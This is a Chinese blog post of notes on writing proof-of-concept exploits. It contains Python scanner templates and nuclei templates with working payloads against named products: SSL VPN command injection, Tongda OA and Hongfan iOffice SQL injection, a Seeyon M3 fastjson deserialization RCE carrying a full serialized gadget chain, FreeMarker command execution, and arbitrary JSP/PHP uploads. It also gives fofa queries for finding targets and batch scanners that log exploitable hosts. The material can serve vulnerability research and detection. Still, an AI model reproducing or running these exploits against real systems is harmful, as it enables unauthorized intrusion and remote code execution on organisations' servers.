poc 收集 书写

已于 2024-08-28 21:54:25 修改
阅读量397 收藏 6
点赞数 4
文章标签: web安全
于 2024-08-28 21:51:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ka_ka11/article/details/141650885
版权

基础知识

判断目标是否存在漏洞

1.执行一个命令,判断返回值

2.dnslog ping成功了,说明存在漏洞

3.有回显的状态 echo 111

4.创建文件 mkdir 1.txt 请求文件 url+/x.x.x/1.txt, 对于单个漏洞 /txt/1.txt

5.延时,对目标系统存在违法,准确性存在疑问

6.反弹shell,没有回显。 bash/certutil/bitamin/powershell, 把你服务器端的exe拉到你的服务器

poc的重点

1.忽略不安全的证书

2.请求方式

使用默认请求头(new HashMap<>(),uri)

GetBody(自定义请求头,uri)

GetBodyParam(自定义请求头,uri,data参数)

PostBodyParam(自定义请求头,uri,请求体参数)

PostJsonParam(自定义请求头,uri,json参数)

dnslog型,需要修改app.java

# 修改参数
String sessionId = Math.random*100+""
String subDomain = RestTemplate.getSubDomain(sessionId)
String uri=localTxt.get(i);
SonarQube.SonarQube_fileread(uri,subDomain);
#确保在ping过程中需要时间
Thread.sleep(500);
# 判断漏洞是否存在
Sting s =RestTemplate.RefreshRecord(sessionId)
if(s!=null){
打印漏洞存在
将漏洞url保存到文件中}

python 模板

import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def Poc(url):
target_url = url + 'payload' #验证存在漏洞的url
# 代理池设置
proxy = {
        'http':'127.0.0.1:812',
        'http':'127.0.0.1:8123'
    }
# 请求头部分构造
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',   #模拟浏览器请求
        'cookie':'xxxxxxxxxxxxxx',   #有些请求需要带上cookie才可以请求到想要的内容
        'Connection':'close'   #关闭多余的连接请求
    }
    data = {"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}   #向url中带入请求的数据
    # 使用try except对异常进行处理
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    #取消SSL验证告警
        response = requests.get(url=target_url,headers=headers,data=data,verify=False,proxies=proxy,timeout=10)   #请求漏洞的url
        if response.status_code == 200:
            result = re.search(r'_____',response.text,re.I)    #使用正则匹配页面请求,下划线处填写正则规则
            print('正在获取结果:{}'.format(result.group(1)))
        else:
            print('请求失败:{}'.format(response.status_code))
    except Exception as e:
        print('请求失败: {}'.format(e))

if __name__ == '__main__':
    url = str(input('请输入检测的url:'))
    Poc(url)

python json 版本

import requests

def Poc(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    url = url + "/run"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
        'XXL-JOB-ACCESS-TOKEN': 'default_token',
        'Connection': 'close'  # 关闭额外的连接请求
    }
    json_data = {
        "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler",
        "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1586629003729,
        "glueType": "GLUE_SHELL", "glueSource": "", "glueUpdatetime": 1586699003758, "broadcastIndex": 0,
        "broadcastTotal": 0
    }

    try:
        response = requests.post(url=url, headers=headers, verify=False, json=json_data, proxies=proxy, timeout=10)
        response.raise_for_status()  # 对于错误响应(4xx和5xx),抛出HTTPError
        if response.status_code == 200 and '{"code":200}' in response.text:
            print(f"{url}一定可以打")
            with open('2.txt', 'a') as output_file:
                output_file.write(url + "\n")
        else:
            print(f"{url}漏洞不存在")
    except requests.exceptions.RequestException as e:
        print(f"{url}访问超时,错误提示:{e}")
        # 可选:记录错误或执行其他操作
        pass

if __name__ == '__main__':
    # 从文件中读取每个URL
    with open('1.txt', 'r') as file:
        for line in file:
            url = line.strip()
            Poc(url)

python get 版本

import requests

def Poc(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    url = url + "/api/get-users?p=123&pageSize=123"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
        'Connection': 'close'  # 关闭额外的连接请求
    }

    try:
        response = requests.get(url=url, headers=headers, verify=False, timeout=10)
        response.raise_for_status()  # 对于错误响应(4xx和5xx),抛出HTTPError
        if response.status_code == 200 and 'password' in response.text:
            print(f"{url}一定可以打")
            with open('2.txt', 'a') as output_file:
                output_file.write(url + "\n")
        else:
            print(f"{url}漏洞不存在")
    except requests.exceptions.RequestException as e:
        print(f"{url}访问超时,错误提示:{e}")
        # 可选:记录错误或执行其他操作
        pass

if __name__ == '__main__':
    # 从文件中读取每个URL
    with open('1.txt', 'r') as file:
        for line in file:
            url = line.strip()
            Poc(url)

python get 集成版本

#2023-12-06  作者Pings
import requests

requests.urllib3.disable_warnings()

def exp(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    try:
        res = requests.get(url + "/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls",proxies=proxy, verify=False, timeout=10)
        shell_url = url + '/sslvpn/ceshi.txt'
        if 'x /tmp|echo `whoami` |tee /usr/local/webui/sslvpn/ceshi.txt|ls' in res.text:
            print(f'[+]存在漏洞:{shell_url}')
            with open('exp2_ok.txt', 'a') as f:
                f.write(shell_url + '\n')
        print(url+"漏洞不存在")
    except requests.exceptions.Timeout as e:
        print(f'[!]连接超时: {e}')
    except Exception as e:
        print(f'[!]漏洞不存在或发生异常: {e}')


def main():
    with open('url3.txt', 'r') as f:
        resp = f.readlines()
        for url in resp:
            url = url.strip()
            if 'http' not in url:
                url = 'http://' + url
            exp(url)


if __name__ == '__main__':
    main()

python post版本

import requests

def Poc(url):
    proxy = {
        'http': 'http://127.0.0.1:8080',
    }
    url = url +"/general/reportshop/utils/get_datas.php"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',
        'Connection': 'close'  # 关闭额外的连接请求
    }
    data={'USER_ID': 'OfficeTask',
    'PASSWORD': '',
    'col': '1,1',
    'tab': '5 where 1={`\=\'` 1} union (select uid,sid from user_online where 1\={`=` 1})-- \'1'
}


    try:
        response = requests.post(url=url, headers=headers,data=data,proxies=proxy,verify=False, timeout=10)
        response.raise_for_status()  # 对于错误响应(4xx和5xx),抛出HTTPError
        if response.status_code == 200:
            print(f"{url}一定可以打")
            with open('3.txt', 'a') as output_file:
                output_file.write(url + "\n")
        else:
            print(f"{url}漏洞不存在")
    except requests.exceptions.RequestException as e:
        print(f"{url}访问超时,错误提示:{e}")
        # 可选:记录错误或执行其他操作
        pass

if __name__ == '__main__':
    # 从文件中读取每个URL
    with open('2.txt', 'r') as file:
        for line in file:
            url = line.strip()
            Poc(url)

import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
#app="红帆-ioffice"

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua

def wirte_targets(vurl, filename):
	with open(filename, "a+") as f:
		f.write(vurl + "\n")

proxies={'http': 'http://127.0.0.1:8080',
		'https': 'https://127.0.0.1:8080'}

def check_url(url):
	url=parse.urlparse(url)
	url='{}://{}'.format(url[0],url[1])
	vulnurl="{}/iOffice/prg/set/wss/udfmr.asmx".format(url)
	headers = {
		'User-Agent': get_ua(),
		'Content-Type': 'text/xml; charset=utf-8',
		'SOAPAction': "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
	}
	data = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
      <condition>1=db_name()</condition>
    </GetEmpSearch>
  </soap:Body>
</soap:Envelope>
	'''
	try:
		res = requests.post(vulnurl, verify=False, allow_redirects=False,proxies=proxies, headers=headers,data=data,timeout=5)
		if 'nvarchar' in res.text:
			print("\033[32m[+]{} is vulnerable\033[0m".format(url))
			wirte_targets(vulnurl,"vuln.txt")
		else:
			print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
	except Exception as e:
		print("\033[34m[!]{} request false.\033[0m".format(url))
		pass


def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		# works.append((func_params, None))
		works.append(i)
	# print(works)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(check_url, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == '__main__':
	arg=ArgumentParser(description='check_vulnerabilities By m2')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:url.txt")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	print("[+]任务开始.....")
	start=time()
	if url != None and filename == None:
		check_url(url)
	elif url == None and filename != None:
		for i in open(filename):
			i=i.replace('\n','')
			url_list.append(i)
		multithreading(url_list,10)
	end=time()
	print('任务完成,用时%ds.' %(end-start))

nuclei 模板

yaml的书写规则

nuclei-templates编写语法(二)_nuclei模板-优快云博客

模板 一

1.两次请求

2.反序列化

3.匹配方式--dsl 大小匹配

4.反序列化

id: seeyon-m3server-mobile_portal-rce
info:
  name: 致远M3server反序列化RCE漏洞
  author: kaka620
  severity: critical
  description: '致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。'
  tags: 2023,seeyon,m3server,rce
  metadata:
    max-request: 3
    fofa-query: title="M3-Server"
    verified: true

http:
  - raw:
      - |
        POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/json

        [{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000014afcafebabe0000003301050a004500890a008a008b0a008a008c0a001d008d08007a0a001b008e0a008f00900a008f009107007b0a008a00920800930a002000940800950800960700970800980800580700990a001b009a08009b08007007009c0b0016009d0b0016009e08006708009f0700a00a001b00a10700a20a00a300a40800a50700a60800a70a002000a80800a909002500aa0700ab0a002500ac0800ad0a00ae00af0a002000b00800b10800b20800b30800b40800b50700b60700b70a003000b80a003000b90a00ba00bb0a002f00bc0800bd0a002f00be0a002f00bf0a002000c00800c10a001b00c20a001b00c30800c40700640a001b00c50800c60700c70800c80800c90700ca0701030700cc0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301002c4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700cd0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100204c6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e3b010003636c730100114c6a6176612f6c616e672f436c6173733b010004766172350100214c6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e3b010004636d64730100135b4c6a6176612f6c616e672f537472696e673b010006726573756c740100025b4201000970726f636573736f720100124c6a6176612f6c616e672f4f626a6563743b010003726571010004726573700100016a01000149010001740100124c6a6176612f6c616e672f5468726561643b0100037374720100124c6a6176612f6c616e672f537472696e673b0100036f626a01000a70726f636573736f72730100104c6a6176612f7574696c2f4c6973743b0100154c6a6176612f6c616e672f457863657074696f6e3b01000169010004666c61670100015a01000567726f75700100174c6a6176612f6c616e672f54687265616447726f75703b010001660100194c6a6176612f6c616e672f7265666c6563742f4669656c643b010007746872656164730100135b4c6a6176612f6c616e672f5468726561643b01000d537461636b4d61705461626c650700ce0700cf0700d00700a60700a207009907009c0700620700c70700ca01000a536f7572636546696c65010012546f6d636174436d644563686f2e6a6176610c004600470700d00c00d100d20c00d300d40c00d500d60c00d700d80700cf0c00d900da0c00db00dc0c00dd00de010004657865630c00df00e0010004687474700100067461726765740100126a6176612f6c616e672f52756e6e61626c6501000674686973243001001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0c00e100d6010006676c6f62616c01000e6a6176612f7574696c2f4c6973740c00e200e30c00db00e401000b676574526573706f6e736501000f6a6176612f6c616e672f436c6173730c00e500e60100106a6176612f6c616e672f4f626a6563740700e70c00e800e90100096765744865616465720100106a6176612f6c616e672f537472696e67010003636d640c00ea00eb0100097365745374617475730c00ec005e0100116a6176612f6c616e672f496e74656765720c004600ed0100076f732e6e616d650700ee0c00ef00f00c00f100de01000377696e010007636d642e6578650100022f630100092f62696e2f626173680100022d630100116a6176612f7574696c2f5363616e6e65720100186a6176612f6c616e672f50726f636573734275696c6465720c004600f20c00f300f40700f50c00f600f70c004600f80100025c410c00f900fa0c00fb00de0c00fc00fd0100246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0c00fe00ff0c0100010101000873657442797465730c010200e6010007646f577269746501001f6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e0100136a6176612e6e696f2e42797465427566666572010004777261700100136a6176612f6c616e672f457863657074696f6e01002a79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100156a6176612f6c616e672f54687265616447726f75700100176a6176612f6c616e672f7265666c6563742f4669656c640100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657454687265616447726f757001001928294c6a6176612f6c616e672f54687265616447726f75703b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000d6765745375706572636c61737301000473697a650100032829490100152849294c6a6176612f6c616e672f4f626a6563743b0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076973456d70747901000328295a01000454595045010004284929560100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f77657243617365010016285b4c6a6176612f6c616e672f537472696e673b2956010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b295601000c75736544656c696d69746572010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b0100046e657874010008676574427974657301000428295b42010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000b6e6577496e7374616e636501001428294c6a6176612f6c616e672f4f626a6563743b0100116765744465636c617265644d6574686f6401003979736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f39383334393531333839303130323301003b4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3938333439353133383930313032333b002100440045000000000004000100460047000100480000002f00010001000000052ab70001b100000002004900000006000100000009004a0000000c000100000005004b010400000001004d004e000200480000003f0000000300000001b100000002004900000006000100000057004a00000020000300000001004b0104000000000001004f0050000100000001005100520002005300000004000100540001004d005500020048000000490000000400000001b10000000200490000000600010000005c004a0000002a000400000001004b0104000000000001004f005000010000000100560057000200000001005800590003005300000004000100540008005a004700010048000005d500080011000002fd033bb80002b600034c2bb600041205b600064d2c04b600072c2bb60008c00009c000094e03360415042dbea202cd2d1504323a051905c70006a702b91905b6000a3a061906120bb6000c9a000d1906120db6000c9a0006a7029b1905b60004120eb600064d2c04b600072c1905b600083a071907c1000f9a0006a702781907b600041210b600064d2c04b600072c1907b600083a071907b600041211b600064da700163a081907b60004b60013b600131211b600064d2c04b600072c1907b600083a071907b60004b600131214b600064da700103a081907b600041214b600064d2c04b600072c1907b600083a071907b600041215b600064d2c04b600072c1907b60008c00016c000163a0803360915091908b900170100a201cb19081509b9001802003a0a190ab600041219b600064d2c04b600072c190ab600083a0b190bb60004121a03bd001bb6001c190b03bd001db6001e3a0c190bb60004121f04bd001b5903122053b6001c190b04bd001d5903122153b6001ec000203a061906c601571906b600229a014f190cb60004122304bd001b5903b2002453b6001c190c04bd001d5903bb0025591100c8b7002653b6001e571227b80028b60029122ab6000c99001906bd00205903122b535904122c535905190653a7001606bd00205903122d535904122e5359051906533a0dbb002f59bb003059190db70031b60032b60033b700341235b60036b60037b600383a0e1239b8003a3a0f190fb6003b3a07190f123c06bd001b5903123d535904b20024535905b2002453b6003e190706bd001d5903190e535904bb00255903b70026535905bb002559190ebeb7002653b6001e57190cb60004123f04bd001b5903190f53b6001c190c04bd001d5903190753b6001e57a7004e3a0f1241b8003a3a101910124204bd001b5903123d53b6003e191004bd001d5903190e53b6001e3a07190cb60004123f04bd001b5903191053b6001c190c04bd001d5903190753b6001e57043b1a990006a70009840901a7fe2f1a990006a70011a700083a05a70003840401a7fd32a700044bb10008009500a000a3001200c300d100d400120213028602890040002e003902ed0043003c005702ed0043005a007a02ed0043007d02e702ed0043000002f802fb004300030049000000fe003f0000000d0002000e0009000f001300100018001100240012002e001400340015003c001600430017005a001800650019006a001a0072001b007d001c0088001d008d001e0095002000a0002300a3002100a5002200b6002400bb002500c3002700d1002a00d4002800d6002900e1002b00e6002c00ee002d00f9002e00fe002f010c0030011b0031012600320131003301360034013e003501570036017d0037018a003801b5003901f0003a0213003c021a003d0221003e0264003f0286004402890040028b00410292004202b2004302d4004502d6004702dd003002e3004902ea004c02ed004a02ef004b02f2001202f8005002fb004f02fc0051004a000000d4001500a50011005b005c000800d6000b005b005c0008021a006c005d005e000f02920042005d005e0010028b0049005f0060000f01f000e600610062000d021300c300630064000e012601b700650066000a013e019f00670066000b0157018600680066000c010f01d40069006a0009003402b6006b006c0005004302a7006d006e000600720278006f00660007010c01de00700071000802ef0003005b00720005002702d10073006a0004000202f6007400750000000902ef007600770001001302e5007800790002002402d4007a007b0003007c000000a80017ff002700050107007d07007e070009010000fc001407007ffc001a07008002fc002207008165070082125d0700820cfd002d07008301fe00cb07008107008107008152070084ff009a000f0107007d07007e0700090107007f0700800700810700830107008107008107008107008407003d0001070085fb004af90001f80006fa0005ff000600050107007d07007e0700090100004207008604ff0005000000004207008600000100870000000200887571007e0010000001d4cafebabe00000033001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d000000060001000000c7000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084448434e57504c53707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

      - |
        GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        cmd: whoami
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains((body_1), 'Success') && status_code_2 == 200 && contains((body_1), '\')"

模板 二

1.文件上传

2.两次请求

id: Anheng-mingyu-wangguan-upload

info:
  name: Anheng-mingyu-wangguan-upload
  author: kaka620
  severity: high
  description: 安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞

requests:
  - raw:
      - |+
        POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../test.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=849978f98abe41119122148e4aa65b1a
        Accept-Encoding: gzip
        Content-Length: 173

        --849978f98abe41119122148e4aa65b1a
        Content-Disposition: form-data; name="123"; filename="test.php"
        Content-Type: text/plain

        This page has a vulnerability
        --849978f98abe41119122148e4aa65b1a--

      - |
        GET /test.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'vulnerability'
      - type: status
        status:
          - 200

模板 三

1.命令执行

id: newcapec-CampusMobileServiceManagementPlatform-RCE
info:
  name: 新开普掌上校园服务管理平台service.action远程命令执行漏洞
  author: kaka620
  severity: high
  description: '新开普掌上校园服务管理平台/service_transport/service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。'
  tags: 2023,xinkaipu,rce
  metadata:
    max-request: 3
    fofa-query: title="掌上校园服务管理平台"
    verified: true

http:
  - raw:
      - |
        POST /service_transport/service.action HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
        
        {
          "command": "GetFZinfo",
          "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
          ?new()>${ex(\"cmd /c echo {{randstr}} >./webapps/ROOT/{{randstr}}.txt\")}"
        }

      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(body_2, '{{randstr}}')"

模板 四

1.文件上传

2.传递变量

id: yonyou-nc-accept-fileupload

info:
  name: 用友NC accept.jsp任意文件上传漏洞
  author: fgz
  severity: critical
  description: |
    用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
  reference:
    none
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1085941792"
  tags: yonyou,nc,fileupload,2023

variables:
  boundary: '{{rand_base(29)}}'

http:
  - raw:
      - |
        POST /aim/equipmap/accept.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=---------------------------{{boundary}}
        Accept-Encoding: gzip

        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt"
        Content-Type: text/plain

        <% out.println("{{randstr_2}}"); %>
        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="fname"

        \webapps\nc_web\{{randstr_3}}.jsp
        -----------------------------{{boundary}}--
      - |
        GET /{{randstr_3}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
